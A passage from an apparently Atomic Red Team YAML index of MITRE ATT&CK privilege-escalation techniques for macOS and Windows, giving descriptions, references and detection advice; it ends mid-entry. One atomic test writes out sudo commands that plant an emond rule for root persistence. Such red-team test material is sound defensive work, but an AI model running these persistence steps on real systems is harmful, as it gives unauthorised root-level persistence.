- - source_name: OSX Coldroot RAT - url: https://objective-see.com/blog/blog_0x2A.html - description: Patrick Wardle. (2018, February 17). Tearing Apart the Undetected - (OSX)Coldroot RAT. Retrieved August 8, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Elevated Execution with Prompt - description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges - API to escalate privileges by prompting the user for credentials.(Citation: - AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to - give application developers an easy way to perform operations with root privileges, - such as for application installation or updating. This API does not validate - that the program requesting root privileges comes from a reputable source - or has been maliciously modified. \n\nAlthough this API is deprecated, it - still fully functions in the latest releases of macOS. When calling this API, - the user will be prompted to enter their credentials but no checks on the - origin or integrity of the program are made. The program calling the API may - also load world writable files which can be modified to perform malicious - behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges - to obtain root privileges in order to install malicious software on victims - and install persistence mechanisms.(Citation: Death by 1000 installers; it's - all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot - RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) - to trick the user into granting escalated privileges to malicious code.(Citation: - Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer - Feb 2019) This technique has also been shown to work by modifying legitimate - programs present on the machine that make use of this API.(Citation: Death - by 1000 installers; it's all broken!)" - id: attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-27T12:04:37.823Z' - created: '2020-01-30T14:40:20.187Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - root - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Consider monitoring for /usr/libexec/security_authtrampoline - executions which may indicate that AuthorizationExecuteWithPrivileges - is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges - is being called. Monitoring OS API callbacks for the execution can also be - a way to detect this behavior but requires specialized security tooling. - x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring - x_mitre_contributors: - - Jimmy Astle, @AstleJimmy, Carbon Black - - Erika Noerenberg, @gutterchurl, Carbon Black - x_mitre_platforms: - - macOS - atomic_tests: [] - T1546.014: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.014 - url: https://attack.mitre.org/techniques/T1546/014 - - source_name: xorrior emond Jan 2018 - url: https://www.xorrior.com/emond-persistence/ - description: Ross, Chris. (2018, January 17). Leveraging Emond on macOS For - Persistence. Retrieved September 10, 2019. - - source_name: magnusviri emond Apr 2016 - url: http://www.magnusviri.com/Mac/what-is-emond.html - description: Reynolds, James. (2016, April 7). What is emond?. Retrieved September - 10, 2019. - - source_name: sentinelone macos persist Jun 2019 - url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ - description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. - Retrieved September 10, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Emond - description: |- - Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. - - The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) - - Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. - id: attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T21:37:25.307Z' - created: '2020-01-24T15:15:13.426Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Monitor emond rules creation by checking for files created - or modified in /etc/emond.d/rules/ and /private/var/db/emondClients. - x_mitre_data_sources: - - File monitoring - x_mitre_contributors: - - Ivan Sinyakov - x_mitre_platforms: - - macOS - identifier: T1546.014 - atomic_tests: - - name: Persistance with Event Monitor - emond - auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 - description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) - daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - -' - supported_platforms: - - macos - input_arguments: - plist: - description: Path to attacker emond plist file - type: path - default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist - executor: - command: | - sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist - sudo touch /private/var/db/emondClients/T1546.014 - cleanup_command: | - sudo rm /etc/emond.d/rules/T1546.014_emond.plist - sudo rm /private/var/db/emondClients/T1546.014 - name: sh - elevation_required: true - T1546: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546 - url: https://attack.mitre.org/techniques/T1546 - - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - description: Ballenthin, W., et al. (2015). Windows Management Instrumentation - (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. - source_name: FireEye WMI 2015 - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux - Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. - source_name: amnesia malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Event Triggered Execution - description: "Adversaries may establish persistence and/or elevate privileges - using system mechanisms that trigger execution based on specific events. Various - operating systems have means to monitor and subscribe to events such as logons - or other user activity such as running specific applications/binaries. \n\nAdversaries - may abuse these mechanisms as a means of maintaining persistent access to - a victim via repeatedly executing malicious code. After gaining access to - a victim system, adversaries may create/modify event triggers to point to - malicious content that will be executed whenever the event trigger is invoked.(Citation: - FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia - malware)\n\nSince the execution can be proxied by an account with higher permissions, - such as SYSTEM or service accounts, an adversary may be able to abuse these - triggered execution mechanisms to escalate their privileges. " - id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-21T18:48:27.576Z' - created: '2020-01-22T21:04:23.285Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false - x_mitre_detection: "Monitoring for additions or modifications of mechanisms - that could be used to trigger event-based execution, especially the addition - of abnormal commands such as execution of unknown programs, opening network - sockets, or reaching out across the network. Also look for changes that do - not line up with updates, patches, or other planned administrative activity. - \n\nThese mechanisms may vary by OS, but are typically stored in central repositories - that store configuration information such as the Windows Registry, Common - Information Model (CIM), and/or specific named files, the last of which can - be hashed and compared to known good values. \n\nMonitor for processes, API/System - calls, and other common ways of manipulating these event repositories. \n\nTools - such as Sysinternals Autoruns can be used to detect changes to execution triggers - that could be attempts at persistence. Also look for abnormal process call - trees for execution of other commands that could relate to Discovery actions - or other techniques. \n\nMonitor DLL loads by processes, specifically looking - for DLLs that are not recognized or not normally loaded into a process. Look - for abnormal process behavior that may be due to a process loading a malicious - DLL. Data and events should not be viewed in isolation, but as part of a chain - of behavior that could lead to other activities, such as making network connections - for Command and Control, learning details about the environment through Discovery, - and conducting Lateral Movement. " - x_mitre_data_sources: - - API monitoring - - Windows event logs - - System calls - - Binary file metadata - - Process use of network - - WMI Objects - - File monitoring - - Process command-line parameters - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Windows Registry - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1574.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.005 - url: https://attack.mitre.org/techniques/T1574/005 - - source_name: mozilla_sec_adv_2012 - url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ - description: Robert Kugler. (2012, November 20). Mozilla Foundation Security - Advisory 2012-98. Retrieved March 10, 2017. - - source_name: Executable Installers are Vulnerable - url: https://seclists.org/fulldisclosure/2015/Dec/34 - description: 'Stefan Kanthak. (2015, December 8). Executable installers are - vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation - of privilege. Retrieved December 4, 2014.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Executable Installer File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. - - Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. - id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-26T19:20:23.030Z' - created: '2020-03-13T11:12:18.558Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_effective_permissions: - - Administrator - - User - - SYSTEM - x_mitre_detection: |- - Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. - - Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. - x_mitre_data_sources: - - Process command-line parameters - - File monitoring - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_platforms: - - Windows - atomic_tests: [] - T1068: - technique: - created: '2017-05-31T21:30:55.066Z' - modified: '2020-03-26T21:12:49.194Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1068 - external_id: T1068 - description: |- - Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. - - When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods. - name: Exploitation for Privilege Escalation - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839 - x_mitre_version: '1.2' - x_mitre_data_sources: - - Windows Error Reporting - - Process monitoring - - Application logs - x_mitre_detection: |- - Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. - - Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges. - x_mitre_effective_permissions: - - User - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false - atomic_tests: [] - T1055.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.011 - url: https://attack.mitre.org/techniques/T1055/011 - - url: https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx - description: Microsoft. (n.d.). About Window Classes. Retrieved December 16, - 2017. - source_name: Microsoft Window Classes - - url: https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx - description: Microsoft. (n.d.). GetWindowLong function. Retrieved December - 16, 2017. - source_name: Microsoft GetWindowLong function - - url: https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx - description: Microsoft. (n.d.). SetWindowLong function. Retrieved December - 16, 2017. - source_name: Microsoft SetWindowLong function - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html - description: MalwareTech. (2013, August 13). PowerLoader Injection – Something - truly amazing. Retrieved December 16, 2017. - source_name: MalwareTech Power Loader Aug 2013 - - url: https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/ - description: Matrosov, A. (2013, March 19). Gapz and Redyms droppers based - on Power Loader code. Retrieved December 16, 2017. - source_name: WeLiveSecurity Gapz and Redyms Mar 2013 - - url: https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx - description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December - 16, 2017. - source_name: Microsoft SendNotifyMessage function - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Extra Window Memory Injection - description: "Adversaries may inject malicious code into process via Extra Window - Memory (EWM) in order to evade process-based defenses as well as possibly - elevate privileges. EWM injection is a method of executing arbitrary code - in the address space of a separate live process. \n\nBefore creating a window, - graphical Windows-based processes must prescribe to or register a windows - class, which stipulate appearance and behavior (via windows procedures, which - are functions that handle input/output of data).(Citation: Microsoft Window - Classes) Registration of new windows classes can include a request for up - to 40 bytes of EWM to be appended to the allocated memory of each instance - of that class. This EWM is intended to store data specific to that window - and has specific application programming interface (API) functions to set - and get its value. (Citation: Microsoft GetWindowLong function) (Citation: - Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough - to store a 32-bit pointer and is often used to point to a windows procedure. - Malware may possibly utilize this memory location in part of an attack chain - that includes writing code to shared sections of the process’s memory, placing - a pointer to the code in EWM, then invoking execution by returning execution - control to the address in the process’s EWM.\n\nExecution granted through - EWM injection may allow access to both the target process's memory and possibly - elevated privileges. Writing payloads to shared sections also avoids the use - of highly monitored API calls such as WriteProcessMemory and - CreateRemoteThread.(Citation: Endgame Process Injection July - 2017) More sophisticated malware samples may also potentially bypass protection - mechanisms such as data execution prevention (DEP) by triggering a combination - of windows procedures and other system functions that will rewrite the malicious - payload inside an executable portion of the target process. (Citation: MalwareTech - Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning - code in the context of another process may allow access to the process's memory, - system/network resources, and possibly elevated privileges. Execution via - EWM injection may also evade detection from security products since the execution - is masked under a legitimate process. " - id: attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:26:33.191Z' - created: '2020-01-14T17:18:32.126Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_detection: 'Monitor for API calls related to enumerating and manipulating - EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and - SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated - with this technique have also used SendNotifyMessage (Citation: Microsoft - SendNotifyMessage function) to trigger the associated window procedure and - eventual malicious injection. (Citation: Endgame Process Injection July 2017)' - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1484: - technique: - external_references: - - source_name: mitre-attack - external_id: T1484 - url: https://attack.mitre.org/techniques/T1484 - - source_name: TechNet Group Policy Basics - url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ - description: 'srachui. (2012, February 13). Group Policy Basics – Part 1: - Understanding the Structure of a Group Policy Object. Retrieved March 5, - 2019.' - - source_name: ADSecurity GPO Persistence 2016 - url: https://adsecurity.org/?p=2716 - description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence - #17: Group Policy. Retrieved March 5, 2019.' - - source_name: Wald0 Guide to GPOs - url: https://wald0.com/?p=179 - description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and - OUs. Retrieved March 5, 2019. - - source_name: Harmj0y Abusing GPO Permissions - url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ - description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved - March 5, 2019. - - source_name: Mandiant M Trends 2016 - url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf - description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved - March 5, 2019. - - source_name: Microsoft Hacking Team Breach - url: https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/ - description: 'Microsoft Secure Team. (2016, June 1). Hacking Team Breach: - A Cyber Jurassic Park. Retrieved March 5, 2019.' - - source_name: Harmj0y SeEnableDelegationPrivilege Right - url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ - description: Schroeder, W. (2017, January 10). The Most Dangerous User Right - You (Probably) Have Never Heard Of. Retrieved March 5, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Group Policy Modification - description: "Adversaries may modify Group Policy Objects (GPOs) to subvert - the intended discretionary access controls for a domain, usually with the - intention of escalating privileges on the domain. Group policy allows for - centralized management of user and computer settings in Active Directory (AD). - GPOs are containers for group policy settings made up of files stored within - a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: - TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike - other objects in AD, GPOs have access controls associated with them. By default - all user accounts in the domain have permission to read GPOs. It is possible - to delegate GPO access control permissions, e.g. write access, to specific - users or groups in the domain.\n\nMalicious GPO modifications can be used - to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), - [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), - [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create - Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035), - \ and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide - to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends - 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many - user and machine settings in the AD environment, there are a great number - of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide - to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask - can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) - by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: - Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases - an adversary might modify specific user rights like SeEnableDelegationPrivilege, - set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, - to achieve a subtle AD backdoor with complete control of the domain because - the user account under the adversary's control would then be able to modify - GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)\n" - id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-26T21:17:41.231Z' - created: '2019-03-07T14:10:32.650Z' - x_mitre_is_subtechnique: false - x_mitre_defense_bypassed: - - System access controls - - File system access controls - x_mitre_detection: "It is possible to detect GPO modifications by monitoring - directory service changes using Windows event logs. Several events may be - logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory - service object was modified\n* Event ID 5137 - A directory service object - was created\n* Event ID 5138 - A directory service object was undeleted\n* - Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A - directory service object was deleted\n\n\nGPO abuse will often be accompanied - by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), - which will have events associated with it to detect. Subsequent permission - value modifications, like those to SeEnableDelegationPrivilege, can also be - searched for in events associated with privileges assigned to new logons (Event - ID 4672) and assignment of user rights (Event ID 4704). " - x_mitre_version: '1.1' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_data_sources: - - Windows event logs - x_mitre_contributors: - - Itamar Mizrahi, Cymptom - - Tristan Bennett, Seamless Intelligence - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574 - url: https://attack.mitre.org/techniques/T1574 - - source_name: Autoruns for Windows - url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. - Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Hijack Execution Flow - description: |- - Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. - - There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. - id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:28.288Z' - created: '2020-03-12T20:38:12.465Z' - x_mitre_data_sources: - - Environment variable - - Loaded DLLs - - Process command-line parameters - - Process monitoring - - File monitoring - - DLL monitoring - x_mitre_detection: |- - Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. - - Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. - - Monitor for changes to environment variables, as well as the commands to implement these changes. - - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. - - Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1546.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.012 - url: https://attack.mitre.org/techniques/T1546/012 - - url: https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ - description: Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). - Retrieved December 18, 2017. - source_name: Microsoft Dev Blog IFEO Mar 2010 - - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview - description: Microsoft. (2017, May 23). GFlags Overview. Retrieved December - 18, 2017. - source_name: Microsoft GFlags Mar 2017 - - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit - description: Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent - Process Exit. Retrieved June 27, 2018. - source_name: Microsoft Silent Process Exit NOV 2017 - - url: https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - description: Moe, O. (2018, April 10). Persistence using GlobalFlags in Image - File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018. - source_name: Oddvar Moe IFEO APR 2018 - - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. - Retrieved November 12, 2014. - source_name: Tilbury 2014 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml - description: FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. - Retrieved December 18, 2017. - source_name: FSecure Hupigon - - url: https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 - description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December - 18, 2017. - source_name: Symantec Ushedix June 2008 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Image File Execution Options Injection - description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) - - IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) - - IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit 